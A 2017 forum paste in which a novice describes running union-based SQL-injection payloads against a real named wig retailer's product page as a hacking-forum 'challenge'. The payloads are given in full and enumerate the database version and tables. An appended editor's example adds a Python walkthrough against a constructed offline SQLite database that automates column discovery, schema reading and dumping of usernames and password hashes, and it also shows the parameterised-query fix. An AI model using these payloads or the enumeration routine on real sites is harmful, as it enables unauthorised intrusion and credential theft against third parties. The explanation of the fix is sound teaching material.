runtothehills

Untitled

Nov 5th, 2017
@ Berry White and JaNuS18 - Okay, thanks. Sorry about not posting the database name command that I used - the combination of my head getting buggy & the fact that I cannot yet post links caused me to make the OP too short...

The SQLi challenge that I was messing around with, trying to get my foot in the door (experience-wise at SQLi), can be found on the HF site. It's the thread called "Challenge Number 001 - Easy", by pishicat_Injector. It can be found, by anyone who wants to see it, at: > Hack Forums home page > Hacks, Exploits, and Various Discussions > Website and Forum Hacking > SQL Injection Attacks > about the 19th+ thread down. The original target URL is "fridaynighthair.com/products_show.asp?productid=685".

At first, I was just noodling around, not really knowing what I was doing, just trying to see if I could get the hang of doing his first task & rule (Union Based && GET Method). But then, during a frustration break, I started looking around the HF site and found the ebook "Advanced SQL injection just became easier"... So, I started to follow that ebook and actually started to get somewhere with SQLi and his target URL...

The command string (unparaphrased) that I used to get the database name was: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from information_schema.schemata--". Once all of that is injected into the URL bar and then [enter], I notice an output string on the page that was not there before... It appears at the top of the right sidebar of the page... It's white text with an orange background, and says "Put me on the waiting list". However, I'd think that's a strange name for a database, and it's also a link, so it may not be the database name.

The command string (unparaphrased) that I used to get the SQL version was: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--". It outputs, "Microsoft SQL Server 2012 - 11.0.5556.0 (X64) Oct 31 2014 16:50:24 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)".

...

Then, the command string (unparaphrased) that I use to try and get the table names is: "fridaynighthair.com/products_show.asp?productid=-685 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 FROM information_schema.tables WHERE table_schema=database()--".

... At first, I thought the 8 table names were the bolded words that appear on the left sidebar (In Stock Products, Custom Products, Lace Wigs Information, Repair Services, Store Information, Wig Care Tips, Wholesale Program, and Store Policies), but now I don't think so, because they also appear there when only the target URL is entered. That, and when I looked back at pishicat_Injector's challenge thread ("Challenge Number 001 - Easy"), he includes a proof in the form of a pic that reads:

"Table: user", "Columns: UserID : UserName : UserEmail :", "Article: UserPassword : sign : sex : homepage :", and "addDate: logins :" ... and then the group of info below that is: "Table: xr_songhuo", "Columns: songid : subject : jsmoney : fangshi :", and "songidorder: py1 : py2 : py3 :".

... But now, I'm pretty sure that I either messed up while I was trying to get the table names, or I just didn't notice the table names when I did it, because none of my terms that I thought were table names match any of his terms (unless I'm just reading his pic wrong). One thing that I didn't do, but I think I vaguely remember reading about, was take a look at the HTML source code (view source) to see if any table names might have appeared there.

If I find that there are 7 vulnerable columns in a database, does that mean that those same 7 columns are vulnerable throughout all of the tables (if there are multiple tables)? In other words, I currently also find myself wondering about the structure of the database(s)... For instance, I used to think that on the top level, there might be only 1 database or multiple databases?.. And then each one of those databases might have only 1 or multiple tables?.. And the way that I thought of the layout of the tables in each database was that they were stacked on top of each other (like a spreadsheet file, with maybe multiple dividers separating each table)?..

But now I'm not so sure that view of it all holds water?.. Maybe, it is the way that the databases and tables are originally created?..
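Editor's added example (not code from the post, the challenge thread or the ebook it mentions). The post works through the three steps of union-based injection - find the number of columns, find which of them is reflected on the page, then swap a metadata expression into that slot - and asks whether the "7 vulnerable columns" belong to every table. The walkthrough below runs those steps against a constructed SQLite database (the products/users tables, their rows, the vulnerable handler modelled on products_show.asp and the page template are all assumptions made up here so it runs offline). It makes the structural point concrete: the column count is a property of the injected SELECT statement, not of any table; each table has its own columns, which step 3 then reads out of the catalogue. Two caveats a practitioner would raise about the payloads in the post: the column count is usually found with ORDER BY n rather than guessed at 66, and the version string the post got back is Microsoft SQL Server, where group_concat() and database() do not exist (they are MySQL functions); SQLite happens to have group_concat, which is why the example can use it, while on SQL Server you would read DB_NAME() and information_schema.tables (or sys.tables) one row at a time.

```python
"""Union-based SQL injection, step by step, against a constructed SQLite database.

Added example, not code from the original post or challenge. The products/users
tables, their rows, the vulnerable handler and the page template are all
constructed here so the walkthrough runs offline.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: one database, two tables, each with its own columns."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, description TEXT);
        INSERT INTO products VALUES (685, 'Lace front wig', 129.0, 'Human hair, 18 inch');
        CREATE TABLE users (user_id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-1');
        INSERT INTO users VALUES (2, 'editor', 'constructed-hash-2');
    """)
    return con


def vulnerable_products_show(con, productid: str):
    """Mimics products_show.asp?productid=...: the parameter is pasted into the SQL text."""
    sql = f"SELECT id, name, price, description FROM products WHERE id = {productid}"
    return con.execute(sql).fetchall()


def safe_products_show(con, productid: str):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT id, name, price, description FROM products WHERE id = ?"
    return con.execute(sql, (productid,)).fetchall()


def render_page(rows):
    """Mimics the template: only name and description are written into the HTML,
    so only positions 2 and 4 of an injected row ever become visible on the page."""
    return [cell for row in rows for cell in (row[1], row[3])]


def find_column_count(query, max_cols=20) -> int:
    """Step 1: ORDER BY n succeeds until n exceeds the SELECT's column count."""
    for n in range(1, max_cols + 1):
        try:
            query(f"685 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("no error up to max_cols; try a larger bound")


def find_reflected_positions(query, ncols):
    """Step 2: a UNION row of distinct markers shows which positions reach the page.
    -685 matches no product, so only the injected row comes back."""
    markers = ",".join(f"'pos{i}'" for i in range(1, ncols + 1))
    visible = render_page(query(f"-685 UNION SELECT {markers}--"))
    return [int(v[3:]) for v in visible if isinstance(v, str) and v.startswith("pos")]


def extract(query, ncols, position, expr) -> str:
    """Step 3: put one scalar expression in a reflected slot, NULL everywhere else."""
    cols = ["NULL"] * ncols
    cols[position - 1] = expr
    visible = render_page(query(f"-685 UNION SELECT {','.join(cols)}--"))
    return next(v for v in visible if v is not None)


def run_walkthrough(con) -> dict:
    """Full enumeration: column count -> reflected slot -> version, tables, columns, rows."""
    def query(payload):
        return vulnerable_products_show(con, payload)

    ncols = find_column_count(query)
    positions = find_reflected_positions(query, ncols)
    slot = positions[0]

    def pull(expr):
        return extract(query, ncols, slot, expr)

    # SQLite stand-ins for @@version and information_schema. On MySQL the catalogue
    # is information_schema with group_concat(); on SQL Server it is
    # information_schema.tables / sys.tables and DB_NAME(), with no group_concat().
    return {
        "column_count": ncols,
        "reflected_positions": positions,
        "version": pull("sqlite_version()"),
        "tables": pull("(SELECT group_concat(name) FROM sqlite_master WHERE type='table')"),
        "users_ddl": pull("(SELECT sql FROM sqlite_master WHERE name='users')"),
        "users_dump": pull("(SELECT group_concat(username || ':' || password_hash) FROM users)"),
    }


if __name__ == "__main__":
    con = build_db()
    for key, value in run_walkthrough(con).items():
        print(f"{key}: {value}")
    print("parameterised:", safe_products_show(con, "-685 UNION SELECT 1,2,3,4--"))
```

Running it shows column_count 4, reflected_positions [2, 4], then the engine version, the two table names, the CREATE statement for users (its columns) and finally the users rows, all read through slot 2. The same handler with a bound parameter returns nothing for the injected value, because the whole string is compared against id instead of being compiled as SQL.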